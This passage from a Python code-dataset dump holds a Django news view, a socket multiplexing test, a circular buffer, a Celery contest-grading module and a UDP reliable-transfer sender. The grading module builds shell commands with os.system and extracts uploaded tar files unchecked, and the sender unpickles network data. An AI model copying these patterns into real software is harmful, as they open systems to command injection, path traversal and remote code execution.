context)\n\n\ndef tag_news(request, slug):\n tag = get_object_or_404(Tag, slug=slug)\n news_list = tag.news.all()\n paginator = Paginator(news_list, settings.PAGE_SIZE)\n page_number = request.GET.get('page')\n page = paginator.get_page(page_number)\n context = {\n 'tag': tag,\n 'page': page\n }\n return render(request, 'news/tag.html', context)\n\n\ndef statistics(request):\n news_list = News.objects.all()\n paginator = Paginator(news_list, settings.PAGE_SIZE)\n page_number = request.GET.get('page')\n page = paginator.get_page(page_number)\n context = {\n 'page': page,\n }\n return render(request, 'news/statistics.html', context)\n","sub_path":"news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"75237495","text":"import time\nfrom threading import Thread\n\nfrom bxutils import logging\n\nfrom bxcommon.test_utils.abstract_test_case import AbstractTestCase\nfrom bxcommon.connections.abstract_node import AbstractNode\nfrom bxcommon.connections.node_type import NodeType\nfrom bxcommon.network.network_event_loop_factory import create_event_loop\nfrom bxcommon.test_utils import helpers\nfrom bxcommon.test_utils.helpers import generate_bytearray\n\nlogger = logging.get_logger(__name__)\n\n\nclass TestNode(AbstractNode):\n def __init__(self, port, peers_ports, timeout=None, send_bytes=None):\n opts = helpers.get_common_opts(port)\n super(TestNode, 
self).__init__(opts)\n\n self.port = port\n self.peers_ports = peers_ports\n self.timeout = timeout\n\n self.initialized = False\n self.closed = False\n self.finished_sending = True\n self.ready_to_close = False\n\n self.connections = []\n\n self.send_bytes = send_bytes if send_bytes is not None else bytearray(0)\n self.memory_view = memoryview(self.send_bytes)\n self.bytes_sent = 0\n\n self.receive_buffers = {}\n\n self.timeout_triggered_loops = 0\n\n def send_request_for_relay_peers(self):\n pass\n\n def get_outbound_peer_addresses(self):\n peer_addresses = []\n\n for peer_port in self.peers_ports:\n peer_addresses.append(('0.0.0.0', peer_port))\n\n return peer_addresses\n\n def build_connection(self, socket_connection, ip, port, from_me=False):\n return None\n\n def on_connection_added(self, socket_connection, port, ip, from_me):\n fileno = socket_connection.fileno()\n print(\"Node {0}: Add_connection call. Fileno {1}\".format(self.port, fileno))\n self.connections.append((socket_connection, socket_connection.fileno(), port, ip, from_me))\n self.receive_buffers[fileno] = bytearray(0)\n\n def on_connection_initialized(self, fileno):\n self.initialized = True\n\n def on_connection_closed(self, fileno, should_retry):\n print(\"Node {0}: on_connection_closed call. Fileno {1}\".format(self.port, fileno))\n self.ready_to_close = True\n\n def get_bytes_to_send(self, fileno):\n print(\"Node {0}: get_bytes_to_send call. Fileno {1}\".format(self.port, fileno))\n if self.bytes_sent >= len(self.send_bytes):\n logger.debug(\"All bytes sent. Total bytes sent {0}\".format(len(self.send_bytes)))\n self.finished_sending = True\n\n return self.memory_view[self.bytes_sent:]\n\n def on_bytes_sent(self, fileno, bytes_sent):\n print(\"Node {0}: on_bytes_sent call. Fileno {1}. bytes sent {2}\"\n .format(self.port, fileno, bytes_sent))\n self.bytes_sent += bytes_sent\n\n if len(self.send_bytes) == self.bytes_sent:\n self.ready_to_close = True\n\n def on_bytes_received(self, fileno: int, bytes_received: bytearray):\n print(\"Node {0}: on_bytes_received call. {1} bytes received from connection {2}\"\n .format(self.port, len(bytes_received), fileno))\n self.receive_buffers[fileno] += bytes_received\n\n def get_sleep_timeout(self, triggered_by_timeout, first_call=False):\n print(\"Node {0}: get_sleep_timeout called.\".format(self.port))\n\n if triggered_by_timeout:\n self.timeout_triggered_loops += 1\n return self.timeout\n\n def force_exit(self):\n print(\"Node {0}: force_exit call. 
Exit: {1}\".format(self.port, self.ready_to_close))\n return self.ready_to_close\n\n def close(self):\n print(\"Node {0}: Close call.\".format(self.port))\n self.closed = True\n\n def on_input_received(self, file_no: int) -> bool:\n return True\n\n\nclass MultiplexingTest(AbstractTestCase):\n\n def test_multiplexing__send(self):\n receiver_node = TestNode(8001, [], 0.01)\n receiver_event_loop = create_event_loop(receiver_node)\n receiver_thread = Thread(target=receiver_event_loop.run)\n\n send_bytes = generate_bytearray(1000)\n\n sender_node = TestNode(8002, [8001], None, send_bytes)\n sender_event_loop = create_event_loop(sender_node)\n\n try:\n print(\"Starting event loop on receiver\")\n receiver_thread.start()\n\n # let receiver run for 0.1 sec, more than timeout time\n time.sleep(0.1)\n\n sender_event_loop.run()\n\n receiver_thread.join()\n\n self._validate_successful_run(send_bytes, sender_node, receiver_node, sender_event_loop,\n receiver_event_loop)\n\n # verify that sender does not have any timeout triggered loops and receiver does\n self.assertEqual(sender_node.timeout_triggered_loops, 0)\n self.assertTrue(receiver_node.timeout_triggered_loops > 0)\n finally:\n if receiver_thread.is_alive():\n receiver_thread.join()\n\n receiver_event_loop.close()\n sender_event_loop.close()\n\n def test_multiplexing__delayed_connect(self):\n receiver_port = helpers.get_free_port()\n receiver_node = TestNode(receiver_port, [], 0.01)\n receiver_event_loop = create_event_loop(receiver_node)\n receiver_thread = Thread(target=receiver_event_loop.run)\n\n send_bytes = generate_bytearray(1000)\n\n sender_port = helpers.get_free_port()\n sender_node = TestNode(sender_port, [], 0.01, send_bytes)\n sender_event_loop = create_event_loop(sender_node)\n sender_thread = Thread(target=sender_event_loop.run)\n\n try:\n print(\"Starting event loop on receiver\")\n receiver_thread.start()\n\n print(\"Starting event loop on sender\")\n sender_thread.start()\n\n # let threads run for 0.1 sec\n time.sleep(0.1)\n\n self.assertEqual(len(receiver_node.connections), 0)\n self.assertEqual(len(sender_node.connections), 0)\n\n # request connection while clients are running\n sender_node.enqueue_connection('0.0.0.0', receiver_node.port)\n\n receiver_thread.join()\n sender_thread.join()\n\n self._validate_successful_run(send_bytes, sender_node, receiver_node, sender_event_loop,\n receiver_event_loop)\n finally:\n if receiver_thread.is_alive():\n receiver_thread.join()\n\n if sender_thread.is_alive():\n sender_thread.join()\n\n receiver_event_loop.close()\n sender_event_loop.close()\n\n def test_multiplexing__disconnect(self):\n receiver_port = helpers.get_free_port()\n receiver_node = TestNode(receiver_port, [], 0.01)\n receiver_event_loop = create_event_loop(receiver_node)\n receiver_thread = Thread(name=\"receiver\", target=receiver_event_loop.run)\n\n sender_port = helpers.get_free_port()\n sender_node = TestNode(sender_port, [receiver_port], 0.01)\n sender_event_loop = create_event_loop(sender_node)\n sender_thread = Thread(name=\"sender\", target=sender_event_loop.run)\n\n try:\n print(\"Starting event loop on receiver\")\n receiver_thread.start()\n sender_thread.start()\n\n # let threads run for 0.1 sec\n time.sleep(0.1)\n\n self.assertEqual(len(receiver_node.connections), 1)\n self.assertEqual(len(sender_node.connections), 1)\n\n # request disconnect while clients are running\n sender_node.enqueue_disconnect(sender_node.connections[0][0], False)\n\n # sender and receiver have to disconnect and exit\n 
receiver_thread.join()\n sender_thread.join()\n finally:\n if receiver_thread.is_alive():\n receiver_thread.join()\n\n if sender_thread.is_alive():\n sender_thread.join()\n\n receiver_event_loop.close()\n sender_event_loop.close()\n\n def _validate_successful_run(self, send_bytes, sender_node, receiver_node, sender_event_loop, receiver_event_loop):\n self.assertTrue(sender_node.bytes_sent, len(send_bytes))\n\n self.assertTrue(len(sender_node.connections), 1)\n self.assertTrue(len(sender_event_loop._socket_connections), 1)\n self.assertEqual(sender_node.connections[0][2], '0.0.0.0')\n self.assertEqual(sender_node.connections[0][3], receiver_node.port)\n self.assertEqual(sender_node.connections[0][4], True)\n\n self.assertTrue(len(receiver_node.connections), 1)\n self.assertTrue(len(receiver_event_loop._socket_connections), 1)\n self.assertEqual(receiver_node.connections[0][2], '127.0.0.1')\n self.assertEqual(receiver_node.connections[0][4], False)\n\n bytes_received = receiver_node.receive_buffers[receiver_node.connections[0][1]]\n self.assertEqual(bytes_received, send_bytes)\n\n self.assertTrue(sender_node.force_exit())\n self.assertTrue(receiver_node.force_exit)\n self.assertTrue(sender_node.closed)\n self.assertTrue(receiver_node.closed)\n self.assertTrue(sender_node.initialized)\n self.assertTrue(receiver_node.initialized)\n","sub_path":"test/integration/network/test_multiplexing.py","file_name":"test_multiplexing.py","file_ext":"py","file_size_in_byte":9180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"296437398","text":"#!/usr/bin/env python\n#coding: utf-8\n\nimport random, math\n\n\nclass TSCircularBuffer():\n '''A circular buffer that stores items and associated relative log-likelihood of reads on them.\n Allows picking random items based on these likelihoods. TSCircularBuffer gives O(1) amortized performance on inserts,\n O(1) on indexed reads and O(logN) performance for random reads where N is the size of the buffer.'''\n\n def __init__(self, size):\n '''Initialize storage structures and state variables.'''\n \n self._data = dict()\n self._cum_prob = list()\n \n self._size = size\n self._cursor = 0\n self._rolled_over_once = False\n \n # These variables help guarantee performance without causing numerical overflow in probability values.\n self._prob_zero = 0\n self._exp_zero = 0\n \n \n def insert(self, item, log_prob):\n '''Insert an item item into the buffer.'''\n \n # Record the zero error in the cumulative probabilities.\n if self._rolled_over_once:\n self._prob_zero = self._cum_prob[self._cursor]\n \n self._data[self._cursor] = item\n \n if self._rolled_over_once:\n self._cum_prob[self._cursor] = self._cum_prob[self._cursor-1] + math.exp(log_prob - self._exp_zero)\n elif self._cursor != 0:\n self._cum_prob.append(self._cum_prob[self._cursor-1] + math.exp(log_prob))\n else:\n self._cum_prob.append(math.exp(log_prob))\n \n self._cursor += 1\n if self._cursor == self._size:\n \n # Capture rollover, reset cursor and adjust cumulative probability values\n self._rolled_over_once = True\n self._cursor = 0\n self._adjustSums()\n \n \n def _adjustSums(self):\n '''Adjust cumulative probability values based on the last-written item's log-likelihood. 
This periodic step\n ensures that probabilities will not blow up during long runs.'''\n \n # Calculate the probability of the last-written item and set a new 'zero' value for future log-likelihoods.\n ratio = self._cum_prob[-1] - self._cum_prob[-2]\n self._exp_zero = math.log(ratio)\n \n # Divide existing cumulative probability values and their zero error by the probability of the last item.\n for index in xrange(self._size):\n self._cum_prob[index] /= ratio\n self._prob_zero /= ratio\n \n \n def rand(self):\n '''Returns a random item from buffer based on probabilities derived from the log-likelihoods associated with items.'''\n \n if not self._rolled_over_once and self._cursor == 0:\n return None\n \n # Calculate a cumulative probability threshold to search for taking into account the zero error\n threshold = random.random() * (self._cum_prob[self._cursor - 1] - self._prob_zero) + self._prob_zero\n \n return self._thresholdItem(threshold)\n \n \n def _thresholdItem(self, threshold):\n '''Performs a binary search to find the item such that threshold lies in the cumulative probability range specified by the item.'''\n \n begin = self._cursor - self._size if self._rolled_over_once else 0\n end = self._cursor - 1\n \n while begin != end:\n mid = (begin + end) / 2\n \n if self._cum_prob[mid] < threshold:\n begin = mid + 1\n else:\n end = mid\n \n return self[begin]\n \n \n def __getitem__(self, index):\n '''Item-getter for indexed reads.'''\n \n return self._data[index % self._size]\n\n\n","sub_path":"chirp/ts_circular_buffer.py","file_name":"ts_circular_buffer.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"430116496","text":"import os\nimport json\nimport tarfile\nfrom timeit import default_timer as timer\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\n\nfrom celery import shared_task\n\nfrom . 
import models\n\n\n################################### SUBMISSSIONS\n\ndef SaveTaskSubmission(code, user, task):\n code = code.replace('\\r\\n', '\\n')\n submission = models.ContestTaskSubmission(task=task, author=user, code=code)\n\n task_tests = models.ContestTaskTest.objects.filter(task=task)\n ttests =[]\n for ttest in task_tests:\n ttests.append(models.ContestTaskSubmissionTest(submit=submission, test=ttest))\n \n # Save everything\n submission.save()\n for a in ttests:\n a.save()\n # Call celery\n RunSubmission.apply_async(args=[submission.id])\n\n@shared_task\ndef RunSubmission(submission_id):\n submission = models.ContestTaskSubmission.objects.get(pk=submission_id)\n submission_path = os.path.join(submission.task.path, str(submission.special_id))\n submission_tests = models.ContestTaskSubmissionTest.objects.filter(submit=submission)\n correct = 0\n\n try:\n source_path = SaveSubmissionCode(submission_path, submission.code)\n\n submission.score = 0\n for stest in submission_tests:\n return_val = RunSubmissionTest(stest, source_path, submission_path)\n if return_val == 4:\n correct += 1\n for stest in submission_tests:\n if stest.score >= 0:\n submission.score += stest.score\n if correct == len(submission_tests):\n submission.result = 4\n elif correct == 0:\n submission.result = 2\n else:\n submission.result = 3\n except Exception as e:\n print('[ERROR]', e, '[END_SUBMISSION_ERROR]')\n submission.result = 1\n submission.score = -1\n submission.save()\n\ndef RunSubmissionTest(stest, source_path, submission_path):\n return_code = EvalSubmissionTest(stest, source_path, submission_path)\n\n if return_code == 0:\n test_result = 4\n elif return_code == -1:\n test_result = 2\n elif return_code == -2:\n test_result = 3\n else:\n test_result = 1\n\n stest.result = test_result\n stest.save()\n\n return test_result\n\ndef EvalSubmissionTest(stest, source_path, submission_path):\n input_path = os.path.join(stest.test.path, 'input.in')\n expected_output_path = os.path.join(stest.test.path, 'output.out') \n output_path = os.path.join(submission_path, str(stest.test.ord_id) + '_output.out')\n\n run_command = f\"timeout --preserve-status {stest.test.task.timelimit + 1}s {settings.EDLANG_BINARY} {source_path} < {input_path} > {output_path}\"\n check_command = f\"diff -B -Z -E --strip-trailing-cr {expected_output_path} {output_path} > /dev/null\"\n start = timer()\n run_return = os.system(run_command)\n end = timer()\n time_spent = end - start\n if time_spent > stest.test.task.timelimit:\n stest.score = 0\n os.system(f\"rm {output_path}\")\n return -1\n if run_return:\n os.system(f\"rm {output_path}\")\n return run_return\n check_return = os.system(check_command)\n os.system(f\"rm {output_path}\")\n if check_return:\n stest.score = 0\n return -2\n stest.score = 1\n return 0\n\ndef SaveSubmissionCode(path, code):\n os.makedirs(path, exist_ok=True)\n source_path = os.path.join(path, 'source.ed')\n with open(source_path, 'w+', encoding='utf-8') as f:\n f.write(code)\n\n return source_path\n\n################################### TASK_PCAKAGES\n\ndef UploadContestTaskPackage(package, user, contest):\n contest_path = os.path.join(settings.CONTESTS_DIR, str(contest.special_id))\n contest_task_package_path = SaveContestTaskPackage(package, contest_path)\n\n IntermidiateTask.apply_async(args=(user.id, contest_task_package_path, contest.id))\n\n@shared_task\ndef IntermidiateTask(user_id, contest_task_package_path, contest_id):\n try:\n user = get_user_model().objects.get(pk=user_id)\n upload = 
models.ContestTaskPackageUpload(author=user, path=contest_task_package_path)\n upload.save()\n\n UploadContestTaskPackageCelery(contest_task_package_path, contest_id, upload.id)\n upload.result = 2\n except Exception as e:\n print('[ERROR] Loading Task Pacakge', e, '[END_ERROR]')\n upload.result = 1\n upload.save()\n\ndef UploadContestTaskPackageCelery(contest_task_package_path, contest_id, contest_task_upload_id):\n contest = models.Contest.objects.get(pk=contest_id)\n contest_path = os.path.join(settings.CONTESTS_DIR, str(contest.special_id))\n\n upload = models.ContestTaskPackageUpload.objects.get(pk=contest_task_upload_id)\n \n # DO THINGS\n contest_task_path = UnpackContestTestPackage(contest_task_package_path, contest_path)\n\n task = GenerateContestTaskFromPath(contest_task_path, contest, upload)\n GenerateContestTasksTestsFromContestTask(task)\n # DONE THINGS\n\n upload.result = 2\n\ndef GenerateContestTasksTestsFromContestTask(contest_task):\n # TODO\n # DO IT BETETER\n task_tests = [os.path.join(contest_task.path, x) for x in os.listdir(contest_task.path) if os.path.isdir(os.path.join(contest_task.path, x))]\n for task_dir in task_tests:\n ord_id = int(os.path.basename(task_dir)[4:])\n task_test = models.ContestTaskTest(task=contest_task, path=task_dir, ord_id=ord_id)\n task_test.save()\n\ndef GenerateContestTaskFromPath(contest_task_path, contest, upload):\n # Body\n body_path = os.path.join(contest_task_path, 'body.html')\n with open(body_path, 'r+', encoding='utf-8') as f:\n body = f.read()\n \n # Config\n config_path = os.path.join(contest_task_path, 'config.json')\n with open(config_path, 'r+', encoding='utf-8') as f:\n config = json.loads(f.read())\n \n title = config['title']\n timelimit = config['timelimit']\n sublimit = config['sublimit']\n points = config['points']\n ord_id = config['ord_id']\n\n task = models.ContestTask(contest=contest, package=upload, ord_id=ord_id, timelimit=timelimit, sublimit=sublimit, body=body, title=title, path=contest_task_path)\n task.save()\n\n return task\n\ndef UnpackContestTestPackage(contest_task_package_path, contest_path):\n contest_task_path = os.path.splitext(os.path.splitext(contest_task_package_path)[0])[0]\n # contest_task_folder_name = os.path.basename(contest_path)\n\n tar = tarfile.open(contest_task_package_path, 'r')\n tar.extractall(contest_path)\n tar.close()\n\n return contest_task_path\n\n# def CreateTaskObjectFromPath()\n\ndef SaveContestTaskPackage(package, contest_path):\n os.makedirs(contest_path, exist_ok=True)\n\n contest_task_path = os.path.join(contest_path, package.name)\n with open(contest_task_path, 'wb+') as d:\n for chunk in package.chunks():\n d.write(chunk)\n\n return contest_task_path\n","sub_path":"SKE_CONTESTS/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"635335841","text":"import sys\nimport socket\nimport pickle\nimport threading\nimport random\nimport time\nfrom threading import Timer\n\nreceiver_host_ip = sys.argv[1]\nreceiver_port = int(sys.argv[2])\nfilename = sys.argv[3]\nMWS = int(sys.argv[4])\nMSS = int(sys.argv[5])\ngamma = int(sys.argv[6])\n#PLD moudle\npdrop = float(sys.argv[7])\npduplicate = float(sys.argv[8])\npcorrupt = float(sys.argv[9])\nporder = float(sys.argv[10])\nmaxorder = int(sys.argv[11])\npdelay = float(sys.argv[12])\nmaxdelay = int(sys.argv[13])\nPLD_seed = int(sys.argv[14])\n\nfor i in range(1,15):\n print(sys.argv[i])\n# filename = 'test0.pdf'\n# 
MSS = 150\n# MWS = 600\n# pdrop = 0.2\n# pduplicate = 0.2\n# pcorrupt = 0.2\n# porder=0.2\n# maxorder=3\n# pdelay=0.2\n# maxdelay=50\npk_status = \"ok\"\nrandom.seed(PLD_seed)\n\nclass STP_Segment: # Header and data\n def __init__(self, SYN=0, ACK=0, FIN=0, seq=0, ack=0, mss=0, data=\"\", status=\"\", time1=0,\\\n delay_clock=0, s_time=0, length=0):\\\n self.SYN, self.ACK, self.FIN, self.seq, self.ack, self.mss, self.data, self.status, self.time1, self.delay_clock,\\\n self.s_time, self.length = SYN, ACK, FIN, seq, ack, mss, data, status, time1, delay_clock, s_time, length\n\nskt = socket.socket(socket.AF_INET,\n socket.SOCK_DGRAM)\n\naddress = (receiver_host_ip, receiver_port)\n\nlog_file = open(\"Sender_log.txt\", \"w\")\n\nlock = threading.Semaphore()\n\ndef handshake(): # set a sequence number for sender\n seq = 0\n handshake1 = STP_Segment(SYN=1)\n handshake1 = pickle.dumps(handshake1)\n skt.sendto(handshake1, address)\n handshake1 = pickle.loads(handshake1)\n log_file.writelines(\"snd {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, handshake1.seq, len(handshake1.data), 0))\n seg, addr = skt.recvfrom(1024)\n seg = pickle.loads(seg)\n log_file.writelines(\"rcv {:2.3f} A {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, seg.seq, len(seg.data), seg.ack))\n if seg.SYN == 1 and seg.ACK == 1:\n new_seq = seq + 1\n new_ack = seg.seq + 1\n handshake3 = STP_Segment(ACK=1, seq=new_seq, ack=new_ack)\n handshake3 = pickle.dumps(handshake3)\n skt.sendto(handshake3, addr)\n handshake3 = pickle.loads(handshake3)\n log_file.writelines(\"snd {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, handshake3.seq, len(handshake3.data), handshake3.ack))\n print(\"Connecting success!\")\n else:\n skt.close()\n print(\"Connecting fail.\")\n\nbegin_time = time.time()\nhandshake()\n\ndata_list = {} # all the data are chopped well in this hash\n\n\ndef clip_data(): #chop the data\n global data_list\n global MSS\n global total_amount\n\n with open(filename, 'rb') as file_handle:\n data_set = file_handle.read()\n data_amount = len(data_set)\n for i in range(0, data_amount, MSS):\n seg_data = data_set[i: i+MSS]\n data_seg = STP_Segment(ACK=1, data=seg_data, seq=i+1)\n data_list[i+1] = data_seg\n return data_amount\n\ntotal_amount = clip_data()\n\ntotal_len = total_amount\n\nmss_value = STP_Segment(mss=MSS, length=total_len)\nmss_value = pickle.dumps(mss_value)\nskt.sendto(mss_value, address)\n\n\n\nmax_buffernum = int(MWS / MSS)\n\nlast_send = 0\ninit_flag = STP_Segment(seq=0,ack=1)\nsending_buffer = [0]\nreceiving_buffer = [1]\nreorder_list = {}\ndelay_list = []\ntotal_delay = 0\ntotal_amount = 0\n\nER = 500\nDR = 250\n#gamma = 4\ntimeout = 0\ntimeout = (ER + gamma * DR) / 1000\nskt.settimeout(timeout)\n\nnew_timeout = timeout\nsend_time = 0\nsampleRTT = 0\n\n##############\ntotal_pac = 0\ntotal_pld = 0\ntotal_drop = 0\ntotal_corr = 0\ntotal_reorder = 0\ntotal_dup = 0\ntotal_del = 0\ntotal_timeout = 0\ntotal_fr = 0\ntotal_dupack = 0\n\n\n\n\n\ndef send():\n global sending_buffer\n global receiving_buffer\n global data_list\n global address\n global MWS\n global last_send\n global pk_status\n global reorder_list\n global delay_list\n global total_delay\n global maxdelay\n global new_timeout\n global send_time\n global sampleRTT\n global ER\n global DR\n global gamma\n\n global total_pac\n global total_pld\n global total_drop\n global total_corr\n global total_reorder\n global total_dup\n global total_del\n global total_timeout\n global total_fr\n global total_dupack\n\n while 
True:\n pk_status = \"ok\"\n total_pac += 1\n send_time = 0\n sampleRTT = 0\n if receiving_buffer.count(receiving_buffer[-1]) > 3:\n total_fr += 1\n data_send = pickle.dumps(data_list[receiving_buffer[-1]])\n PLD(data_send)\n\n if receiving_buffer[-1] > sending_buffer[-1]:\n data_send = pickle.dumps(data_list[receiving_buffer[-1]])\n PLD(data_send)\n\n for i in data_list:\n if (i > sending_buffer[-1]) and (i < receiving_buffer[-1] + MWS):\n data_send = pickle.dumps(data_list[i])\n PLD(data_send)\n break\n\n if len(list(reorder_list.keys())) != 0 and reorder_list[list(reorder_list.keys())[0]] == maxorder:\n num1 = list(reorder_list.keys())[0]\n reorder_list.pop(num1)\n data_send = pickle.dumps(data_list[num1])\n PLD(data_send)\n data_send = pickle.loads(data_send)\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n\n for ele in delay_list:\n time_now = time.time()\n if (time_now - ele.time1)/1000 >= ele.delay_clock:\n data_send = pickle.dumps(ele)\n skt.sendto(data_send, address)\n data_send = pickle.loads(data_send)\n log_file.writelines(\"snd/delay {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, data_send.seq, len(data_send.data), data_send.ack))\n delay_list.remove(ele)\n\n\n\n if pk_status != \"drop\" and pk_status != \"corr\" and pk_status != \"reorder\" \\\n and pk_status != \"rdelay\":\n try:\n data_receive, addr = skt.recvfrom(1024)\n data_receive = pickle.loads(data_receive)\n if data_receive.ack < total_len:\n log_file.writelines(\"rcv {:2.3f} A {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, data_receive.ACK, len(data_receive.data), data_receive.ack))\n if data_receive.ack in receiving_buffer:\n total_dupack += 1\n receiving_buffer.append(data_receive.ack)\n if data_receive.s_time != 0:\n sampleRTT = (time.time() - data_receive.s_time) / 1000\n ER = 0.875 * ER + 0.125 * sampleRTT\n DR = 0.75 * DR + 0.25 * abs(sampleRTT-ER)\n new_timeout = (ER + gamma * DR) / 1000\n\n except socket.timeout:\n total_timeout += 1\n data_send = pickle.dumps(data_list[receiving_buffer[-1]])\n PLD(data_send)\n skt.settimeout(new_timeout)\n if receiving_buffer[-1] > total_len:\n break\n\ndef PLD(data_send):\n global sending_buffer\n global receiving_buffer\n global data_list\n global address\n global MWS\n global pk_status\n global reorder_list\n global delay_list\n global total_delay\n global maxdelay\n global new_timeout\n global send_time\n global sampleRTT\n\n global total_pac\n global total_pld\n global total_drop\n global total_corr\n global total_reorder\n global total_dup\n global total_del\n global total_timeout\n global total_fr\n global total_dupack\n\n total_pld += 1\n\n if len(list(reorder_list.keys())) != 0:\n reorder_list[list(reorder_list.keys())[0]] += 1\n\n ran_num = random.random()\n print(ran_num)\n if ran_num < pdrop:\n total_drop += 1\n pk_status = \"drop\"\n #print(\"drop\",)\n data_send = pickle.loads(data_send)\n log_file.writelines(\"drop {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, data_send.seq, len(data_send.data), data_send.ack))\n print(\"drop\", data_send.seq)\n\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n return\n\n ran_num = random.random()\n print(ran_num)\n if ran_num < pduplicate:\n total_dup += 1\n data_send = pickle.loads(data_send)\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n data_send.s_time = time.time()\n data_send.status = \"good\"\n\n data_send = pickle.dumps(data_send)\n skt.sendto(data_send, address)\n 
data_send = pickle.loads(data_send)\n log_file.writelines(\"snd {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, data_send.seq, len(data_send.data), data_send.ack))\n print(data_send.seq)\n\n data_send.status = \"dup\"\n data_send = pickle.dumps(data_send)\n skt.sendto(data_send, address)\n data_send = pickle.loads(data_send)\n log_file.writelines(\"snd/dup {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, data_send.seq, len(data_send.data), data_send.ack))\n print(\"dup\", data_send.seq)\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n return\n\n ran_num = random.random()\n print(ran_num)\n if ran_num < pcorrupt:\n pk_status = \"corr\"\n total_corr += 1\n data_send = pickle.loads(data_send)\n data_send.status = \"corr\"\n data_send = pickle.dumps(data_send)\n skt.sendto(data_send, address)\n data_send = pickle.loads(data_send)\n log_file.writelines(\"snd/corr {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, data_send.seq, len(data_send.data), data_send.ack))\n\n print(\"corr\", data_send.seq)\n\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n return\n\n ran_num = random.random()\n print(ran_num)\n if ran_num < porder and len(reorder_list) == 0:\n total_reorder += 1\n data_send = pickle.loads(data_send)\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n data_send.s_time = time.time()\n data_send.status = \"good\"\n\n pk_status = \"reorder\"\n reorder_list[data_send.seq] = 0\n return\n\n ran_num = random.random()\n print(ran_num)\n if ran_num < pdelay:\n total_del += 1\n print(\"delay\")\n delay_time = random.randint(0, maxdelay)\n if delay_time + total_delay < maxdelay:\n pk_status = \"rdelay\"\n total_delay = delay_time + total_delay\n\n data_send = pickle.loads(data_send)\n\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n data_send.s_time = time.time()\n data_send.status = \"good\"\n\n\n data_send.time1 = time.time()\n data_send.delay_clock = delay_time\n if len(delay_list) != 0:\n if delay_list[-1].seq != data_send.seq:\n delay_list.append(data_send)\n return\n\n data_send = pickle.loads(data_send)\n if data_send.seq in sending_buffer:\n log_file.writelines(\"snd/RXT {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time() - begin_time, data_send.seq, len(data_send.data), data_send.ack))\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n data_send.s_time = time.time()\n data_send.status = \"good\"\n log_file.writelines(\"snd {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time() - begin_time, data_send.seq, len(data_send.data), data_send.ack))\n\n data_send = pickle.dumps(data_send)\n skt.sendto(data_send, address)\n data_send = pickle.loads(data_send)\n print(data_send.seq)\n\n\nsend()\n\ndef shake():\n global address\n seq1 = total_len + 1\n handshake1 = STP_Segment(SYN=1, seq=seq1, ack=1)\n handshake1 = pickle.dumps(handshake1)\n skt.sendto(handshake1, address)\n handshake1 = pickle.loads(handshake1)\n log_file.writelines(\"snd {:2.3f} F {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, handshake1.seq, len(handshake1.data), 1))\n\n seg, address = skt.recvfrom(1024)\n seg = pickle.loads(seg)\n log_file.writelines(\"rcv {:2.3f} F {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, seg.seq, len(seg.data), seg.ack))\n\n if seg.SYN == 1 and seg.ACK == 1:\n new_seq = seq1 + 1\n handshake3 = STP_Segment(ACK=1, seq=new_seq, ack=2)\n handshake3 = 
pickle.dumps(handshake3)\n skt.sendto(handshake3, address)\n handshake3 = pickle.loads(handshake3)\n log_file.writelines(\"snd {:2.3f} A {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, handshake3.seq, len(handshake3.data), 2))\n\n # seg, address = skt.recvfrom(1024)\n # seg = pickle.loads(seg)\n # log_file.writelines(\"rcv {:2.3f} A {:5d} {:3d} {:5d}\\n\"\n # .format(time.time() - begin_time, seg.seq, len(seg.data), seg.ack))\n print(\"Connecting break!\")\n else:\n skt.close()\n print(\"Breaking fail.\")\n\n\nshake()\n\nlog_file.writelines(\"====================================\\n\")\nlog_file.writelines(\"Size of the file: {}\\n\".format(total_len))\nlog_file.writelines(\"Segments transmitted (including drop & RXT): {}\\n\".format(total_pac))\nlog_file.writelines(\"Number of Segments handled by PLD: {}\\n\".format(total_pld))\nlog_file.writelines(\"Number of Segments Dropped: {}\\n\".format(total_drop))\nlog_file.writelines(\"Number of Segments Corrupted: {}\\n\".format(total_corr))\nlog_file.writelines(\"Number of Segments Re-ordered: {}\\n\".format(total_reorder))\nlog_file.writelines(\"Number of Segments Duplicated: {}\\n\".format(total_dup))\nlog_file.writelines(\"Number of Segments Delayed: {}\\n\".format(total_del))\nlog_file.writelines(\"Number of Retransmissions due to timeout: {}\\n\".format(total_timeout))\nlog_file.writelines(\"Number of Fast Retransmissions: {}\\n\".format(total_fr))\nlog_file.writelines(\"Number of Duplicate Acknowledgements received:{}\\n\".format(total_dupack))\nlog_file.writelines(\"====================================\")\n","sub_path":"All projects/Modified 